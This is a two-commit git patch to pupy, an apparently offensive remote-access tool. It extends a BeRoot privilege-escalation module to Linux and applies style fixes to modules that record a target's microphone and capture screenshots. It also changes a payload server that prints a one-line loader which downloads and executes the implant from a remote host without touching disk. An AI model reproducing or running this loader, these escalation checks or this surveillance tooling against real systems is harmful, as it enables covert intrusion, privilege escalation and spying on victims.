From d713be6c4a4d4896ee458ebdabacdb94beaffac2 Mon Sep 17 00:00:00 2001 From: AlessandroZ Date: Wed, 19 Sep 2018 18:04:00 +0200 Subject: [PATCH 1/2] adding beroot for linux --- pupy/external/BeRoot | 2 +- pupy/modules/beroot.py | 79 +++++++++++++++++------------ pupy/packages/linux/all/beroot | 1 + pupy/packages/windows/all/beRoot.py | 1 - pupy/packages/windows/all/beroot | 2 +- pupy/tox.ini | 2 +- 6 files changed, 51 insertions(+), 36 deletions(-) create mode 120000 pupy/packages/linux/all/beroot delete mode 120000 pupy/packages/windows/all/beRoot.py diff --git a/pupy/external/BeRoot b/pupy/external/BeRoot index 6a2c1c51..b5115909 160000 --- a/pupy/external/BeRoot +++ b/pupy/external/BeRoot @@ -1 +1 @@ -Subproject commit 6a2c1c51595f618980a5aa9aa23b8871b44bcbe6 +Subproject commit b511590985db57242bd1e84d2a23f018d050281f diff --git a/pupy/modules/beroot.py b/pupy/modules/beroot.py index f1e71ffd..b3312b66 100644 --- a/pupy/modules/beroot.py +++ b/pupy/modules/beroot.py @@ -2,15 +2,14 @@ from pupylib.PupyModule import config, PupyModule, PupyArgumentParser from pupylib.utils.rpyc_utils import redirected_stdio -from pupylib.PupyConfig import PupyConfig -from os import path -import datetime +from pupylib.utils.rpyc_utils import obtain __class_name__="Beroot" -@config(cat="admin", compat=["windows"]) + +@config(cat="admin", compat=["linux", "windows"]) class Beroot(PupyModule): - """ Windows Privilege escalation """ + """Check for privilege escalation path""" dependencies = { 'windows': [ @@ -20,32 +19,36 @@ class Beroot(PupyModule): @classmethod def init_argparse(cls): - cls.arg_parser = PupyArgumentParser(prog="beroot", description=cls.__doc__) - cls.arg_parser.add_argument("-l", "--list", action="store_true", default=False, help="list all softwares installed (not run by default)") - cls.arg_parser.add_argument("-w", "--write", action="store_true", default=False, help="write output") - cls.arg_parser.add_argument("-c", "--cmd", action="store", default="whoami", help="cmd to execute for the webclient check (default: whoami)") + """ + Check the project on github: https://github.com/AlessandroZ/BeRoot + """ + header = '|====================================================================|\n' + header += '| |\n' + header += '| The BeRoot Project |\n' + header += '| |\n' + header += '| ! BANG BANG ! |\n' + header += '| |\n' + header += '|====================================================================|\n\n' + + cls.arg_parser = PupyArgumentParser(prog="beroot", description=header + cls.__doc__) + cls.arg_parser.add_argument("-c", "--cmd", action="store", default="whoami", help="Windows only: cmd to execute for the webclient check (default: whoami)") def run(self, args): - filepath = None - if args.write: - config = self.client.pupsrv.config or PupyConfig() - folder = config.get_folder('beroot', {'%c': self.client.short_name()}) - filepath = path.join(folder, str(datetime.datetime.now()).replace(" ","_").replace(":","-")+"-beroot.txt") - with redirected_stdio(self): - try: - for r in self.client.conn.modules["beRoot"].run(args.cmd, args.list, args.write): - self.print_output(output=r, write=args.write, file=filepath) - except Exception as e: - print e + run_beroot = self.client.remote('beroot.run', 'run', False) + if self.client.is_windows(): + results = obtain(run_beroot(args.cmd)) + for r in results: + self.windows_output(r) + else: + results = obtain(run_beroot()) + for r in results: + self.linux_output(level=r[0], msg=r[1]) - if args.write: - self.success(filepath) - - def print_output(self, output, write=False, file=None): - toPrint = True + def windows_output(self, output): + to_print = True if 'NotPrint' in output: - toPrint = False + to_print = False st = '\n-------------- %s --------------\n' % output['Category'] if 'list' in str(type(output['All'])): @@ -82,10 +85,22 @@ class Beroot(PupyModule): elif 'str' in str(type(output['All'])): st += output['All'] - if toPrint: - print st + if to_print: + self.log(st) - if write: - f = open(file, 'a') - f.write(st) - f.close() + + def linux_output(self, level='', msg=''): + if level == 'ok': + self.success(msg) + + elif level == 'error': + self.error(msg) + + elif level == 'info': + self.log('[!] {msg}'.format(msg=msg)) + + elif level == 'debug': + self.log('[?] {msg}'.format(msg=msg)) + + else: + self.log(msg) \ No newline at end of file diff --git a/pupy/packages/linux/all/beroot b/pupy/packages/linux/all/beroot new file mode 120000 index 00000000..95c068a7 --- /dev/null +++ b/pupy/packages/linux/all/beroot @@ -0,0 +1 @@ +../../../external/BeRoot/Linux/beroot/ \ No newline at end of file diff --git a/pupy/packages/windows/all/beRoot.py b/pupy/packages/windows/all/beRoot.py deleted file mode 120000 index 4fc5004d..00000000 --- a/pupy/packages/windows/all/beRoot.py +++ /dev/null @@ -1 +0,0 @@ -../../../external/BeRoot/BeRoot/beRoot.py \ No newline at end of file diff --git a/pupy/packages/windows/all/beroot b/pupy/packages/windows/all/beroot index 4ee699af..adcd3237 120000 --- a/pupy/packages/windows/all/beroot +++ b/pupy/packages/windows/all/beroot @@ -1 +1 @@ -../../../external/BeRoot/BeRoot/beroot \ No newline at end of file +../../../external/BeRoot/Windows/BeRoot/beroot/ \ No newline at end of file diff --git a/pupy/tox.ini b/pupy/tox.ini index e2c9ff94..ff9752f4 100644 --- a/pupy/tox.ini +++ b/pupy/tox.ini @@ -51,7 +51,7 @@ exclude = packages/linux/all/lazagne packages/linux/all/laZagne.py packages/linux/all/mimipy.py + packages/linux/all/beroot packages/windows/all/beroot - packages/windows/all/beRoot.py packages/windows/all/lazagne packages/windows/all/laZagne.py From b35c6536c5c6c21e262f65794a8ab301dd253504 Mon Sep 17 00:00:00 2001 From: AlessandroZ Date: Thu, 20 Sep 2018 10:38:34 +0200 Subject: [PATCH 2/2] fix flake8 errors --- pupy/modules/beroot.py | 10 ++-------- pupy/modules/record_mic.py | 12 ++++++------ pupy/modules/screenshot.py | 4 ++-- pupy/pupylib/payloads/py_oneliner.py | 20 ++++++++++---------- 4 files changed, 20 insertions(+), 26 deletions(-) diff --git a/pupy/modules/beroot.py b/pupy/modules/beroot.py index b3312b66..55b29337 100644 --- a/pupy/modules/beroot.py +++ b/pupy/modules/beroot.py @@ -1,7 +1,6 @@ # -*- coding: utf-8 -*- from pupylib.PupyModule import config, PupyModule, PupyArgumentParser -from pupylib.utils.rpyc_utils import redirected_stdio from pupylib.utils.rpyc_utils import obtain __class_name__="Beroot" @@ -20,7 +19,7 @@ class Beroot(PupyModule): @classmethod def init_argparse(cls): """ - Check the project on github: https://github.com/AlessandroZ/BeRoot + Check the project on github: https://github.com/AlessandroZ/BeRoot """ header = '|====================================================================|\n' header += '| |\n' @@ -88,19 +87,14 @@ class Beroot(PupyModule): if to_print: self.log(st) - def linux_output(self, level='', msg=''): if level == 'ok': self.success(msg) - elif level == 'error': self.error(msg) - elif level == 'info': self.log('[!] {msg}'.format(msg=msg)) - elif level == 'debug': self.log('[?] {msg}'.format(msg=msg)) - else: - self.log(msg) \ No newline at end of file + self.log(msg) diff --git a/pupy/modules/record_mic.py b/pupy/modules/record_mic.py index 46ecd0aa..6191e852 100644 --- a/pupy/modules/record_mic.py +++ b/pupy/modules/record_mic.py @@ -45,27 +45,27 @@ class RecordMicrophoneModule(PupyModule): pass self.success("starting recording for %ss ..." % args.time) - + max_length = args.max_length if max_length is None: max_length = args.time if int(max_length) > int(args.time): raise PupyModuleError("--max-length argument cannot be bigger than --time") - + for sw, c, r, rf in self.client.conn.modules['mic_recorder'].record_iter(total=args.time, chunk=max_length): filepath = os.path.join("data","audio_records","mic_" + self.client.short_name() + "_" + str(datetime.datetime.now()).replace(" ","_").replace(":","-") + ".wav") save_wav(filepath, sw, c, r, rf) self.success("microphone recording saved to %s" % filepath) - + if args.view: viewer = self.client.pupsrv.config.get("default_viewers", "sound_player") - + found = False for p in os.environ.get('PATH', '').split(':'): if os.path.exists(os.path.join(p, viewer)): - subprocess.Popen([viewer,filepath]) + subprocess.Popen([viewer, filepath]) found = True break - if not found: + if not found: self.error('Default viewer not found: %s' % viewer) diff --git a/pupy/modules/screenshot.py b/pupy/modules/screenshot.py index 95f3418d..88f2e360 100644 --- a/pupy/modules/screenshot.py +++ b/pupy/modules/screenshot.py @@ -92,7 +92,7 @@ class Screenshoter(PupyModule): if args.view: viewer = config.get('default_viewers', 'image_viewer') - + found = False for p in os.environ.get('PATH', '').split(':'): if os.path.exists(os.path.join(p, viewer)): @@ -100,5 +100,5 @@ class Screenshoter(PupyModule): found = True break - if not found: + if not found: self.error('Default viewer not found: %s' % viewer) diff --git a/pupy/pupylib/payloads/py_oneliner.py b/pupy/pupylib/payloads/py_oneliner.py index a7bdf69f..01b6111e 100644 --- a/pupy/pupylib/payloads/py_oneliner.py +++ b/pupy/pupylib/payloads/py_oneliner.py @@ -83,18 +83,18 @@ def serve_payload(payload, ip="0.0.0.0", port=8080, link_ip=""): port+=1 else: raise - print colorize("[+] ","green") + "copy/paste this one-line loader to deploy pupy without writing on the disk :" - print " --- " + print(colorize("[+] ","green") + "copy/paste this one-line loader to deploy pupy without writing on the disk :") + print(" --- ") oneliner = colorize("python -c 'import urllib;exec urllib.urlopen(\"http://%s:%s/index\").read()'"%(link_ip, port), "green") - print oneliner - print " --- " - - print colorize("[+] ","green") + 'HTTP server started on {ip}:{port}'.format(ip=ip, port=port) - print colorize("[+] ","green") + 'CTCL+C to kill the server' - print colorize("[+] ","green") + 'Waiting for a connection ...' + print(oneliner) + print(" --- ") + + print(colorize("[+] ","green") + 'HTTP server started on {ip}:{port}'.format(ip=ip, port=port)) + print(colorize("[+] ","green") + 'CTCL+C to kill the server') + print(colorize("[+] ","green") + 'Waiting for a connection ...') server.serve_forever() - + except KeyboardInterrupt: - print colorize("[+] ","red") + 'KeyboardInterrupt received, shutting down the web server' + print(colorize("[+] ","red") + 'KeyboardInterrupt received, shutting down the web server') server.socket.close() server.shutdown()